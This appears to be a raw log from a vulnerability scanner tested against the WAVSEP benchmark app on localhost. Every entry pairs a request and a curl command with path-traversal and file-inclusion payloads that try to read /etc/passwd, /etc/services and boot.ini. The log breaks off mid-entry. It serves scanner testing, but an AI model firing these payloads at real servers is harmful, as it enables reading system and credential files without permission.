GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
